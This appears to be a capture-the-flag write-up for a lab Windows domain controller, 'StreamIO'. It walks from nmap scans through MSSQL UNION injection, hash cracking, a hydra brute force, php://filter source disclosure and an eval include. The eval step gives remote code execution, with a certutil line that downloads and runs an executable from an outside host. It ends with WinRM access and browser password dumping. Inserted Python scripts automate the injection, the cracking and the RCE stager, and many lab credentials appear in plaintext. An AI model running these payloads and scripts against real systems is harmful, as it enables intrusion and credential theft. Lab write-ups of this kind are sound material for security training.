nmap -p- --min-rate 10000 -v -sV -sC -A -Pn 10.10.11.158
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open tcpwrapped
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Issuer: commonName=streamIO/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-22T07:03:28
| Not valid after: 2022-03-24T07:03:28
| MD5: b99a 2c8d a0b8 b10a eefa be20 4abd ecaf
|_SHA-1: 6c6a 3f5c 7536 61d5 2da6 0e66 75c0 56ce 56e4 656d
|_ssl-date: 2022-12-22T14:49:29+00:00; +6h59m59s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open tcpwrapped
49694/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-22T14:48:21
|_ start_date: N/A
The HTTPS certificate's SAN lists a subdomain, watch.streamIO.htb; the AD domain is streamIO.htb.
10.10.11.158 watch.streamIO.htb DC.streamIO.htb streamIO.htb
Add these to /etc/hosts.
nmap -n -sV --script "ldap* and not brute" 10.10.11.158
Targeted LDAP scan; the output includes:
dnsHostName: DC.streamIO.htb
So the domain controller is DC.streamIO.htb; put that in /etc/hosts as well.
watch.streamIO.htb has login.php, register.php and an admin directory; admin returns forbidden.
An account registered there cannot log in, though.
The about page lists three staff members: Barry, Oliver, Samantha.
A quick password brute force failed; SQL injection attempts look like they hit a WAF.
Directory scanning finds search.php:
feroxbuster -u https://watch.streamio.htb/ -k -x php
Oddly, dirsearch never found it.
search.php
1' order by 5--+
but with
1' union select 1,2,3,4--+
it turns out NULL is blocked too, so use plain numbers as column fillers:
test' union select 1,2,3,4,5,6--+
At six columns the union works and the second column is reflected.
The value before the quote matters: a bare 1 returns nothing at all, so use a string such as test.
test' union select 1,@@version,3,4,5,6--+
Confirms SQL Server.
test' union select 1,(select db_name()),3,4,5,6--+ #streamio
test' union select 1,(select db_name(1)),3,4,5,6--+ #master
test' union select 1,(select user),3,4,5,6--+ #the user is db_user
# all database names
test' union select 1,concat(name),3,4,5,6 from master..sysdatabases --+
Query dbo.sysobjects for user-created tables (xtype='U') to get their id and name.
Only one column is reflected, so concat the two fields.
test' union select 1,concat(id,name),3,4,5,6 from dbo.sysobjects where xtype='U'--+
885578193 movies
901578250 users
The users table is obviously the interesting one.
test' union select top 1 1,name,3,4,5,6 from dbo.syscolumns where id=901578250 --+
ps. after a lot of fumbling: TOP 1 goes right after SELECT, and id= takes no quotes. Still not fluent with MSSQL.
Final payload:
test' union select top 4 1,name,3,4,5,6 from dbo.syscolumns where id=901578250 --+
users has only four columns.
test' union select 1,concat(username,password),3,4,5,6 from users --+
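The enumeration above boils down to a few rules (numeric fillers because NULL is blocked, TOP directly after SELECT, a string prefix before the quote, one reflected column so values get concat'ed). The following Python is an added example, not part of the original writeup: a payload builder that encodes those rules plus a probe that finds the column count and the reflected position automatically. search.php is replaced by a constructed fake (fake_search_php) so it runs offline; its six-column, column-2 behaviour is an assumption modelled on what the page observed.

```python
"""Payload builder and column-count probe for the UNION injection in search.php.
Added example (not from the original writeup); the target is simulated below."""
import re
from typing import Callable, Optional, Tuple


def union_payload(expr: str, *, cols: int = 6, reflect: int = 2,
                  prefix: str = "test", top: Optional[int] = None,
                  source: Optional[str] = None) -> str:
    """Build  <prefix>' union select [top N] 1,<expr>,3,...,<cols> [from <source>]--+

    - numeric fillers instead of NULL, because the WAF blocks NULL
    - TOP goes directly after SELECT (MSSQL has no LIMIT)
    - a non-empty string prefix is used; a bare 1 returned nothing
    """
    if not 1 <= reflect <= cols:
        raise ValueError("reflected column out of range")
    fields = [str(i) for i in range(1, cols + 1)]
    fields[reflect - 1] = expr
    select = "select " + (f"top {top} " if top else "") + ",".join(fields)
    tail = f" from {source}" if source else ""
    return f"{prefix}' union {select}{tail}--+"


def find_union_shape(send: Callable[[str], str], max_cols: int = 20,
                     marker: str = "__MARK__") -> Tuple[int, int]:
    """Return (column_count, reflected_column).

    `send` submits one payload to search.php and returns the response body.
    A wrong column count makes MSSQL error out and the page shows nothing,
    so each count is tried with the marker in every position until it shows up.
    """
    for n in range(1, max_cols + 1):
        for pos in range(1, n + 1):
            body = send(union_payload(f"'{marker}'", cols=n, reflect=pos))
            if marker in body:
                return n, pos
    raise RuntimeError("no reflected column found; try a larger max_cols")


def fake_search_php(payload: str) -> str:
    """Constructed stand-in for search.php so the probe runs offline (assumption:
    six columns, column 2 reflected, DB errors swallowed, NULL dropped by the WAF)."""
    if re.search(r"\bnull\b", payload, re.I):
        return ""                       # WAF blocks the request outright
    m = re.search(r"union select (?:top \d+ )?(.*?)(?: from .*?)?--\+$", payload)
    if not m:
        return ""
    fields = m.group(1).split(",")
    if len(fields) != 6:
        return ""                       # column-count mismatch -> error -> empty page
    val = fields[1].strip("'")
    return f'<div class="movie">{val}</div>'


if __name__ == "__main__":
    cols, pos = find_union_shape(fake_search_php)
    print(cols, pos)
    for p in (union_payload("@@version", cols=cols, reflect=pos),
              union_payload("concat(id,name)", source="dbo.sysobjects where xtype='U'"),
              union_payload("name", top=4, source="dbo.syscolumns where id=901578250"),
              union_payload("concat(username,password)", source="users")):
        print(p)
```

Against the real target, replace fake_search_php with a function that submits the payload in the search field and returns the response body; everything else stays the same.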
There are two admin rows; one is presumably the account I registered.
Looked up the admin hash on somd5: paddpadd. So it is raw MD5.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt
john --show --format=Raw-MD5 hash.txt
One problem: --show does not print the hash next to the password, so matching results back to usernames is awkward.
--show=left prints the hashes that were not cracked; after removing those, the cracked results line up with the input top to bottom. Not strictly necessary anyway; at worst the later brute force just takes longer.
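The mapping problem above is easier to avoid than to repair: keep the username attached to the hash from the start. This Python is an added example, not part of the original writeup. It splits the concat(username,password) rows (the trailing 32 hex characters are the hash), cracks them against a wordlist while keeping user, hash and password together, and emits john's user:hash input format, which makes john --show print user:password directly. The dump rows and their hashes are constructed here for the demo and are not the box's real values.

```python
"""Crack the concat(username,password) dump offline while keeping the
username <-> hash <-> password mapping. Added example, not from the writeup."""
import hashlib
from typing import Dict, List, Tuple


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


# Constructed sample of the reflected column: username immediately followed by
# its 32-hex-char raw-MD5 hash. Hashes are computed here for the demo.
SAMPLE_DUMP = [
    "admin" + _md5("paddpadd"),
    "admin" + _md5("registered-by-me"),     # the account registered during testing
    "Clara" + _md5("%$clara"),
    "Sabrina" + _md5("!!sabrina$"),
    "Lucifer" + _md5("not-in-the-wordlist"),
]

WORDLIST = ["paddpadd", "12345", "$hadoW", "%$clara", "!!sabrina$", "highschoolmusical"]


def split_dump(rows: List[str]) -> List[Tuple[str, str]]:
    """Split 'usernamehash' rows; the hash is the trailing 32 hex characters."""
    out = []
    for row in rows:
        user, h = row[:-32], row[-32:].lower()
        if len(h) != 32 or any(c not in "0123456789abcdef" for c in h) or not user:
            raise ValueError(f"not a raw-MD5 row: {row!r}")
        out.append((user, h))
    return out


def crack(pairs: List[Tuple[str, str]], wordlist: List[str]):
    """Return (cracked, left). cracked maps (user, hash) -> password,
    left lists the (user, hash) pairs no wordlist entry matched."""
    lookup = {_md5(w): w for w in wordlist}     # hash the wordlist once, not per user
    cracked: Dict[Tuple[str, str], str] = {}
    left: List[Tuple[str, str]] = []
    for user, h in pairs:
        if h in lookup:
            cracked[(user, h)] = lookup[h]
        else:
            left.append((user, h))
    return cracked, left


def to_john_format(pairs: List[Tuple[str, str]]) -> str:
    """'user:hash' lines: john treats the first field as the login name,
    so `john --show` then prints user:password and the mapping is never lost."""
    return "\n".join(f"{u}:{h}" for u, h in pairs)


def for_hydra(cracked) -> Tuple[List[str], List[str]]:
    """Unique username and password lists for hydra -L / -P."""
    users = sorted({u for (u, _) in cracked})
    passwords = sorted(set(cracked.values()))
    return users, passwords


if __name__ == "__main__":
    pairs = split_dump(SAMPLE_DUMP)
    cracked, left = crack(pairs, WORDLIST)
    for (u, h), pw in cracked.items():
        print(f"{u}\t{h}\t{pw}")
    print("uncracked:", left)
    print(to_john_format(pairs))
```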
Username list
admin
Alexendra
Austin
Barbra
Barry
Baxter
Bruno
Carmon
Clara
Diablo
Garfield
Gloria
James
Juliette
Lauren
Lenord
Lucifer
Michelle
Oliver
Robert
Robin
Sabrina
Samantha
Stan
Thane
Theodore
Victor
Victoria
William
yoshihide
Password list
paddpadd
12345
$hadoW
$monique$1991$
%$clara
$3xybitch
##123a8j8w5123##
physics69i
!?Love?!123
!!sabrina$
highschoolmusical
!5psycho8!
66boysandgirls..
Burp Community's Intruder is single-threaded and too slow; use hydra instead.
hydra -L user.txt -P pass.txt streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:Login failed"
A password matched. With that login the admin directory has content.
Clicking the four buttons shows the URL format:
/admin/?user=
/admin/?staff=
/admin/?movie=
/admin/?message=
Fuzz the parameter name, with the thread count halved because the network is bad and higher rates never finish.
wfuzz -c -u "https://streamio.htb/admin/?FUZZ=" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H 'Cookie: PHPSESSID=haaskhe3fcctn9ligs5700fv06' --hh 1678 -t 5
This reveals a debug parameter.
Scan directories again, this time with the session cookie:
feroxbuster -u https://streamio.htb/admin/ -H "Cookie: PHPSESSID=mtknq38sr1n09sageshh5lpqbt" -x php --auto-tune -k
This finds master.php. Read its source through debug with the base64 filter:
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php
<h1>Movie managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST" action="?movie=">
<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['username']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST">
<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>
index.php, read the same way, reveals a database admin password:
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
At the end of master.php there is a plain file include fed straight into eval, which gives RCE.
Start an HTTP server on Kali and host rce.txt containing
system("dir c:\\");
Verified; this way the web root turns out to be c:\inetpub\streamio.htb.
Try writing a webshell:
file_put_contents('c:\\inetpub\\streamio.htb\\yjh.php','<?php eval($_POST[a])?>')
That failed, so find a writable directory and get a shell directly instead.
system("certutil -urlcache -split -f http://10.10.14.6:8000/1.exe c:\\programdata\\1.exe");
# second request
system("c:\\programdata\\1.exe");
Run as two separate requests; shell established.
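The source read through ?debug=php://filter and the include-into-eval step above are the two halves of the chain. The Python below is an added example, not code from the original writeup: helpers to build the filter URL, pull the base64 blob out of the admin page and decode it, parse the sqlsrv credential array out of index.php, and produce a correctly escaped PHP stager (backslashes, double quotes and $ all need escaping inside a PHP double-quoted string, which is why the page's payloads write c:\\programdata). The admin URL, the PHPSESSID placeholder, the attacker URL and the assumption that master.php is reached via ?debug=master.php (so that 'included' is defined) are assumptions; SAMPLE_RESPONSE is constructed to mimic the filter output.

```python
"""Helpers for the ?debug= php://filter read and the POST include= eval RCE.
Added example, not from the writeup. Pure helpers run offline; main() needs a target."""
import base64
import re
from typing import Dict

BASE = "https://streamio.htb/admin/"            # assumption: admin URL from the page


def filter_url(resource: str, base: str = BASE) -> str:
    """Turn the ?debug= include into a source read via the base64 filter."""
    return f"{base}?debug=php://filter/convert.base64-encode/resource={resource}"


def decode_filter_body(html: str) -> str:
    """The filtered file is echoed inline among the page's own HTML:
    take the longest base64 run and decode it."""
    runs = re.findall(r"[A-Za-z0-9+/]{40,}={0,2}", html)
    if not runs:
        raise ValueError("no base64 blob in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")


def extract_sqlsrv_creds(php_src: str) -> Dict[str, str]:
    """Parse array("Database"=>"X", "UID" => "u", "PWD" => 'p') regardless of quote style."""
    pat = r'''"(Database|UID|PWD)"\s*=>\s*(["'])(.*?)\2'''
    return {k: v for k, _q, v in re.findall(pat, php_src)}


def php_stager(cmd: str) -> str:
    """PHP text to host for eval(file_get_contents($_POST['include'])).
    Inside a PHP double-quoted string \\ " and $ must be escaped, in that order."""
    esc = cmd.replace("\\", "\\\\").replace('"', '\\"').replace("$", "\\$")
    return f'system("{esc}");'


# Constructed sample of the ?debug= response for offline use; the credential
# line is the one the page shows, the surrounding HTML is made up.
_SAMPLE_INDEX = ('<?php\n$connection = array("Database"=>"STREAMIO", '
                 '"UID" => "db_admin", "PWD" => \'B1@hx31234567890\');\n?>')
SAMPLE_RESPONSE = ("<html><body><h1>Admin</h1>"
                   + base64.b64encode(_SAMPLE_INDEX.encode()).decode()
                   + "<p>footer</p></body></html>")


def main() -> None:
    import requests                                  # network only
    s = requests.Session()
    s.verify = False                                 # self-signed cert on the box
    s.cookies.set("PHPSESSID", "REPLACE_WITH_ADMIN_SESSION")  # assumption
    src = decode_filter_body(s.get(filter_url("index.php")).text)
    print(extract_sqlsrv_creds(src))
    # Host php_stager("dir c:\\") as stage.txt on the attacker HTTP server, then
    # post include= to master.php via debug so that 'included' is defined (assumption).
    r = s.post(BASE + "?debug=master.php",
               data={"include": "http://10.10.14.6:8000/stage.txt"})
    print(r.text)


if __name__ == "__main__":
    main()
```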
Quick enumeration, e.g. the domain user list with net user /domain:
Administrator Guest JDgodd
krbtgt Martin nikk37
yoshihide
Try the db_admin password found in index.php, using the sqlcmd that ships on the box:
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
The backup database holds a password hash for the domain user nikk37: 389d14cb8e4e9b94b137deb1caf0612a
With the cracked password, WinRM login works and the user flag is obtained.
evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i streamio.htb
ls "c:\Program Files (x86)"
Firefox is installed.
HackBrowserData exports the saved passwords:
UserName,Password,LoginURL,CreateDate
JDgodd,password@12,,2022-02-22T02:41:51-08:00
yoshihide,paddpadd@12,,2022-02-22T02:41:24-08:00
nikk37,n1kk1sd0p3t00:),,2022-02-22T02:41:10-08:00
admin,JDg0dd1s@d0p3cr3@t0r,,2022-02-22T02:40:56-08:00
crackmapexec smb -u JDgodd -p broswer-pass.txt -d streamio.htb -dc streamio.htb
Confirms JDgodd's password is JDg0dd1s@d0p3cr3@t0r.
Collect with BloodHound:
bloodhound-python -u JDgodd -p "JDg0dd1s@d0p3cr3@t0r" -d streamio.htb -dc dc.streamio.htb -ns 10.10.11.158
ps. bloodhound-python's -ns option needs an IP address.
BloodHound shows no path, though. Other writeups read the LAPS password,
but testing shows no permission for that.